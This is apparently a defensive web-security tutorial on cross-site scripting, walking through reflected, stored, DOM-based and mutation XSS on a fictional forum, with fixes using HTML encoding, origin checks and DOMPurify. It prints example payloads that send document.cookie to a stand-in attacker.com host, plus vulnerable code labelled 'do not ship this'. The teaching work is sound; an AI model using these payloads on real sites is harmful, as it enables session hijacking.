A DevForum user posts what looks like a syntax-highlighted code block. It contains a hidden <script> tag. The moment any other logged-in user loads the article, the script fires silently. It reads document.cookie, packages the session token, and sends it to a server the attacker controls. No alert box. No visible sign anything went wrong. Within an hour, forty sessions are hijacked from a single comment.
The developer who built the comment renderer used React. They assumed React protected them. It mostly does — unless you use dangerouslySetInnerHTML. They used it once, eighteen months ago, to support a markdown renderer that needed to inject styled blockquotes. It was never revisited.
That’s XSS. Not a theoretical vulnerability — a routine consequence of trusting user content in the wrong place.
The Browser’s Trust Model
Before looking at how XSS happens, you need to understand why it’s so damaging.
JavaScript that runs inside a page has full access to everything on that page’s origin. document.cookie. localStorage. sessionStorage. Every DOM node. Every form’s contents. The ability to make authenticated fetch() calls to the same origin.
The browser cannot distinguish your JavaScript from injected JavaScript. They run under the same origin, with the same permissions. There’s no flag on a DOM node that says “this script was trusted by the developer.” If a script executes on devforum.com, it has devforum.com’s full authority.
That’s what XSS exploits: the browser’s complete trust in anything that runs inside the page.
Reflected XSS
DevForum has a search feature. The server takes the q parameter and renders results:
// Express route — do not ship this
app.get('/search', (req, res) => {
  res.send(`
    <h1>Results for: ${req.query.q}</h1>
    ${renderResults(req.query.q)}
  `);
});
The parameter goes directly into the HTML with no escaping. An attacker constructs a URL along these lines:
https://devforum.com/search?q=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
They send this link to a DevForum user via a DM. The victim clicks it. The server reflects the script tag into the HTML response, the browser parses it as part of the page, and the payload executes under devforum.com's origin — with full access to the victim's cookies and session.
The fix is one line: HTML-encode the parameter before rendering it. req.query.q becomes he.encode(req.query.q) (using the he HTML encoding library), or you switch to a templating engine that escapes by default. The script tag becomes the literal text <script> — visible, harmless.
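The encoding step is small enough to see in full. Below is a minimal, illustrative sketch of what HTML encoding does — a real library such as he covers far more entities and edge cases, so treat this as a demonstration, not a replacement:

```javascript
// Illustrative only — use a maintained library (he, or your template
// engine's auto-escaping) in production.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')   // must run first, or later entities get double-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// A payload becomes inert literal text:
escapeHtml('<script>alert(1)</script>');
// → '&lt;script&gt;alert(1)&lt;/script&gt;'
```

The ordering matters: ampersands are replaced first so that the entities produced by the later replacements are not themselves re-encoded.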
Why it’s called “reflected”: the payload is sent to the server and reflected straight back in the response. The server is a mirror, not a target.
Stored XSS
Reflected XSS requires the victim to click a crafted link. Stored XSS is more dangerous: the attacker injects the payload once, and it fires for every user who loads the page — no link required.
On DevForum, comments are stored in the database and rendered for every visitor. An attacker posts this comment:
Great article! Really helpful.
<script>
  fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({ cookie: document.cookie, url: location.href })
  });
</script>
The server stores this string in MongoDB. The server renders it into every response for that article. Every logged-in user who visits the article becomes a victim.
This is the attack that hit DevForum at the start of this post. One comment. Forty sessions in an hour. The payload keeps firing until someone notices and deletes it.
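The fix follows the same principle as the reflected case: escape at output time, every time the comment is rendered. A sketch, assuming a renderComment helper on the server (escapeHtml here is a stand-in for a real encoding library such as he):

```javascript
// Sketch: storing the raw string is fine — the mistake is rendering it raw.
// escapeHtml is illustrative; use a maintained library in production.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function renderComment(comment) {
  // Whatever was stored leaves here as inert text, not markup
  return `<div class="comment">${escapeHtml(comment.body)}</div>`;
}
```

Escaping on output, rather than sanitising on input, means the database can hold anything and an encoding bug can be fixed without rewriting stored data.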
DOM-Based XSS
The two variants above both involve the server rendering the payload. DOM-based XSS lives entirely in the client — the server never sees the malicious input.
DevForum has a “highlight by username” feature: open an article with ?highlight=honeysharma in the URL and any mention of that username is visually highlighted. The implementation:
// client.js — do not ship this
const params = new URLSearchParams(location.search);
const user = params.get('highlight');
if (user) {
  document.getElementById('highlight-target').innerHTML =
    `Highlighting mentions of <strong>${user}</strong>`;
}
The highlight parameter goes straight into innerHTML. An attacker crafts a link:
https://devforum.com/articles/123?highlight=<img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">
The server sees a completely normal request for article 123. Its response contains no payload. The payload is in the URL. The browser reads it, the client-side JS writes it to the DOM, and it executes.
Why this matters for detection: WAFs, server-side sanitisers, and security scanners that inspect HTTP responses will find nothing. The vulnerability exists entirely in the client.
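The fix is to stop treating the parameter as markup. A sketch of the same feature with the sink removed (the element id matches the vulnerable version above):

```javascript
// Fix sketch — textContent assigns literal text; the browser never
// interprets it as HTML, so there is no sink left to exploit.
function renderHighlightBanner(target, search) {
  const user = new URLSearchParams(search).get('highlight');
  if (user) {
    target.textContent = `Highlighting mentions of ${user}`;
  }
}

// In the page:
// renderHighlightBanner(document.getElementById('highlight-target'), location.search);
```

The <strong> styling is lost with plain textContent; if markup matters, build the banner with document.createElement and append the username as a text node instead of interpolating it into an HTML string.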
Mutation XSS (mXSS)
Mutation XSS exploits a gap between what a sanitiser considers safe and what the browser’s HTML parser actually produces.
The browser’s HTML parser does not just read markup — it actively repairs it. When it encounters invalid or malformed HTML (unclosed tags, elements nested where they aren’t allowed, mismatched namespaces), it restructures the tree into something valid rather than refusing to render the page. This is why broken HTML still displays in browsers: the parser fixed it silently.
The problem for sanitisers: a sanitiser checks a string before the parser runs. The parser then transforms that string into a different DOM tree. A string that looked safe to the sanitiser can become unsafe after the parser restructures it.
A classic example:
<!-- Input that passes a naive sanitiser (SVG tags allowed, no scripts) -->
<svg><p><style><img src=x onerror=alert(1)>
<!-- What the browser's parser produces -->
<svg>
<p></p>
<style>
<!-- img tag is moved out of style context -->
</style>
</svg>
<img src="x" onerror="alert(1)">
The sanitiser saw a <style> block with what looked like text. The browser’s parser saw invalid nesting inside SVG and restructured — moving the <img> to a position where its onerror handler could fire.
Where Attacker Input Enters — and Where It Explodes
Every XSS attack has two ends. At one end, attacker-controlled text gets into your application — through a URL parameter, a database value, a postMessage event, something the user typed. At the other end, that text lands somewhere the browser interprets it as code: innerHTML, eval(), an element’s href. Nothing bad happens unless these two ends connect without sanitisation in between.
Security literature calls these ends sources (where attacker input enters) and sinks (where input is interpreted as code or markup). The terms are worth knowing because they’re used in every security audit tool, scanner, and code review checklist — but the underlying idea is just: trace the data from where it comes in to where it lands.
| Category | Examples | Risk | Notes |
|---|---|---|---|
| Sink — DOM write | innerHTML, outerHTML, document.write() | Critical | Most common XSS landing point |
| Sink — code exec | eval(), setTimeout(string), setInterval(string) | Critical | Executes string as JavaScript directly |
| Sink — attribute | el.src = x, el.href = x, el.srcdoc = x | High | javascript: scheme injection via attributes |
| Source — URL | location.search, location.hash, document.referrer | High | Most DOM XSS enters here |
| Source — cross-frame | window.addEventListener('message', e => e.data) | Medium | postMessage without origin check |
| Source — API | res.data.commentBody, res.data.username | High | Stored XSS path — data from DB |
| Source — persistence | localStorage.getItem(), window.name | Medium | Survives navigation; often overlooked |
In code review, the exercise is: trace every source. Follow it through the call stack. Does it reach a sink? If yes, is it sanitised before it gets there?
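The pattern is easier to see in code. A hypothetical trace through three small functions — none of them obviously dangerous in isolation, but together they connect a source to a sink with no sanitisation on the path:

```javascript
// Hypothetical example for illustration only.
function readHighlightParam(search) {
  // SOURCE: the attacker controls the URL, so they control this value
  return new URLSearchParams(search).get('highlight');
}

function buildBanner(user) {
  // transform: no sanitisation happens here
  return `Highlighting <strong>${user}</strong>`;
}

function showBanner(el, search) {
  // SINK: innerHTML parses the string as markup
  el.innerHTML = buildBanner(readHighlightParam(search));
}
```

In review, showBanner is the line to flag: a source value reaches innerHTML and no function on the path between them sanitises it.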
postMessage: The Cross-Frame Source
window.postMessage is the browser’s mechanism for two pages to communicate across origins — a parent page talking to an embedded payment widget, a micro-frontend talking to a shell app, an analytics iframe sending data back to the host page.
The source entry in the table above is window.addEventListener('message', e => e.data). Here is what a vulnerable implementation looks like:
// Vulnerable — do not ship this
window.addEventListener('message', (event) => {
  // 'data' is whatever the sender put in postMessage(data, ...)
  // No check on where it came from
  document.getElementById('status').innerHTML = event.data;
});
Any page — from any origin — can send a postMessage to this window. If the event data reaches a DOM sink without sanitisation, the result is DOM-based XSS delivered through the cross-frame channel instead of the URL. Payment iframes, A/B testing tools, analytics scripts, and OAuth popups all use postMessage. If any of them is compromised, a missing origin check turns that compromise into XSS on your page.
The fix is two lines:
const ALLOWED_ORIGIN = 'https://payments.devforum.com';
window.addEventListener('message', (event) => {
  if (event.origin !== ALLOWED_ORIGIN) return; // reject unknown senders
  document.getElementById('status').textContent = event.data; // textContent, not innerHTML
});
Two changes matter: the event.origin check rejects any sender that isn’t the expected iframe, and textContent instead of innerHTML removes the sink entirely — the data is displayed as literal text, not parsed as markup.
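When more than one frame is trusted, the comparison still has to be an exact match. A sketch with a hypothetical origin list (substitute your own embeds):

```javascript
// Hypothetical trusted origins — adjust to the frames you actually embed
const TRUSTED_ORIGINS = new Set([
  'https://payments.devforum.com',
  'https://auth.devforum.com',
]);

function isTrustedOrigin(origin) {
  // Exact match only. Never use startsWith or includes:
  // 'https://payments.devforum.com.evil.com' passes a startsWith check.
  return TRUSTED_ORIGINS.has(origin);
}
```

Inside the message handler, the first line becomes if (!isTrustedOrigin(event.origin)) return;.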
SVG and Markdown Vectors
Two vectors that bypass filters that only check HTML tags:
SVG script injection. Inline SVG is valid HTML5, and the <svg> element creates a different namespace context. A sanitiser that blocks <script> at the HTML level may not check inside SVG:
<svg>
  <script>alert(document.cookie)</script>
</svg>
This executes in Chrome, Firefox, and Safari. A filter that only pattern-matches <script> on the outer HTML will miss it.
Markdown javascript: links. Markdown renderers that convert [text](url) to <a href="url">text</a> without checking the URL scheme:
[Click here for the results](javascript:fetch('https://attacker.com/steal?c='+document.cookie))
This passes sanitisers that only look for HTML tags. The link renders cleanly. When the victim clicks it, the JS executes under the page’s origin.
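The renderer-side defence is a scheme allowlist on every href it emits. A sketch using the WHATWG URL parser — the base URL is a placeholder for your own site, used only to resolve relative links:

```javascript
const SAFE_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);

function isSafeLinkHref(href) {
  let url;
  try {
    // The base resolves relative links; absolute links keep their own scheme
    url = new URL(href, 'https://devforum.com/');
  } catch {
    return false; // unparseable — reject
  }
  // The parser lowercases the scheme, so JaVaScRiPt: is caught too
  return SAFE_PROTOCOLS.has(url.protocol);
}
```

Checking the parsed protocol, rather than pattern-matching the raw string, also defeats case tricks and whitespace padding that slip past naive "starts with javascript:" regexes.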
React, Vue, Angular: The Escape Hatches
React, Vue, and Angular protect you by default. When you render user content through the normal template path, the framework converts it to a text node — not markup:
// Safe — React renders this as a text node, not HTML
function Comment({ body }) {
  return <div className="comment">{body}</div>;
}
If body is <script>alert(1)</script>, React renders it as the literal characters <script>alert(1)</script> — visible, not executable.
The problem is the escape hatch:
// Vulnerable — raw HTML injected into the DOM
function Comment({ body }) {
  return <div dangerouslySetInnerHTML={{ __html: body }} />;
}
// Fixed — sanitise before injecting
import DOMPurify from 'dompurify';
function Comment({ body }) {
  return (
    <div
      dangerouslySetInnerHTML={{ __html: DOMPurify.sanitize(body) }}
    />
  );
}
The same pattern in Vue (v-html) and Angular (bypassSecurityTrustHtml):
<!-- Vue — vulnerable -->
<div v-html="comment.body"></div>
<!-- Vue — fixed -->
<div v-html="sanitize(comment.body)"></div>
// Angular — vulnerable
this.safeHtml = this.sanitizer.bypassSecurityTrustHtml(comment.body);
// Angular — fixed: don't use bypassSecurityTrustHtml with user content
// Let Angular's built-in sanitiser handle it, or pre-sanitise with DOMPurify
DOMPurify in Practice
DOMPurify is the standard client-side sanitiser. It works by parsing the input using the browser’s own HTML parser, walking the resulting DOM, and removing anything that doesn’t pass its allowlist — then serialising the safe DOM back to a string.
import DOMPurify from 'dompurify';
// Basic usage — safe defaults
const clean = DOMPurify.sanitize(dirty);
// Restrict to a specific set of tags — note that ALLOWED_TAGS replaces the
// default allowlist entirely (use ADD_TAGS to extend the defaults instead)
const cleanLimited = DOMPurify.sanitize(dirty, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'li'],
  ALLOWED_ATTR: ['href'],
});
Two configuration details worth understanding — getting either wrong can widen your XSS exposure:
// ALLOW_DATA_ATTR defaults to true, so data-* attributes survive
// sanitisation. Standard HTML never executes data-* attributes, but
// frameworks that bind behaviour to them (e.g. older AngularJS data-ng-*
// directives, Alpine.js x-* equivalents) can turn them into XSS vectors
// in those contexts. Disable them when you don't need them:
DOMPurify.sanitize(dirty, { ALLOW_DATA_ATTR: false });
// FORCE_BODY defaults to false, which means leading content such as a
// <style> element can be relocated into <head> during parsing;
// FORCE_BODY: true keeps the input in body context. Because mXSS depends
// on exactly how the parser restructures input, sanitise in the same
// context in which the output will be inserted, and only change this
// option if you understand the parsing difference.
DOMPurify.sanitize(dirty, { FORCE_BODY: true });
XSS Variant Comparison
| Variant | Source | Server round-trip? | Persistence | Severity |
|---|---|---|---|---|
| Reflected | URL parameter | Yes — payload in response | None — per request | High |
| Stored | Database (user content) | Yes — payload in response | Permanent until deleted | Critical |
| DOM-based | URL / postMessage | No | None | High |
| Mutation (mXSS) | Any sanitised input | Varies | Varies | Critical |
Open Redirect: The Attack that Chains With Everything
Open redirect is not XSS, but it lives in the same place — URL parameters — and is frequently chained with it. A DevForum login page that accepts a next parameter to redirect the user after sign-in:
// Express — do not ship this
app.get('/login', (req, res) => {
  // After auth, redirect to the page the user was trying to reach
  const next = req.query.next || '/dashboard';
  res.redirect(next); // no validation
});
An attacker sends https://devforum.com/login?next=https://evil.com/steal. The user sees a legitimate DevForum URL, logs in, and is redirected to evil.com — a phishing page styled to look like DevForum’s dashboard. The redirect happens silently. The user never typed evil.com.
The fix is to validate the redirect destination against an allowlist of internal paths:
// Only permit relative paths starting with /
function isSafeRedirect(url) {
  return typeof url === 'string' && url.startsWith('/') && !url.startsWith('//');
}
const next = req.query.next;
res.redirect(isSafeRedirect(next) ? next : '/dashboard');
A URL like //evil.com is protocol-relative — the browser resolves it to evil.com on the current page's scheme. The !url.startsWith('//') check catches it. Anything that starts with / but not // is a relative path on the same host.
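One more wrinkle worth guarding against: some browsers normalise backslashes in URLs to forward slashes, so a redirect to /\evil.com can behave like //evil.com. A slightly hardened version of the check:

```javascript
// Hardened sketch of the redirect check, adding the backslash guard
function isSafeRedirect(url) {
  return typeof url === 'string' &&
    url.startsWith('/') &&
    !url.startsWith('//') &&   // protocol-relative URL
    !url.startsWith('/\\');    // \ normalised to / by some browsers → //evil.com
}
```

An even stricter alternative is a plain allowlist of known internal paths, which sidesteps URL-parsing quirks entirely.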
Auditing Your Codebase
Search the codebase for dangerouslySetInnerHTML (and v-html, if you use Vue). Every occurrence warrants a question: where does this HTML come from, and is it passing through DOMPurify before it arrives? If the answer to either is “I’m not sure”, treat it as a vulnerability.
Search the codebase for location.search, location.hash, URLSearchParams, and document.referrer. For each one, trace the value to where it lands. If it reaches innerHTML or any DOM sink without sanitisation, you have DOM XSS.
If you render user-supplied markdown: the vulnerability is in the HTML the renderer produces — not in the markdown source. Run DOMPurify on the rendered HTML. Also verify that your renderer does not produce <a href="javascript:..."> links.
If you rolled your own sanitiser, replace it. Regex-based sanitisers fail against SVG namespacing, mXSS mutations, and javascript: scheme injection; DOMPurify uses the browser’s parser itself. Pin its version and subscribe to its release notes.
XSS prevention (sanitisation, framework escaping) is the first line. CSP — the subject of the next post — is the second. If a payload slips through the first line, CSP blocks its execution. Both lines are required.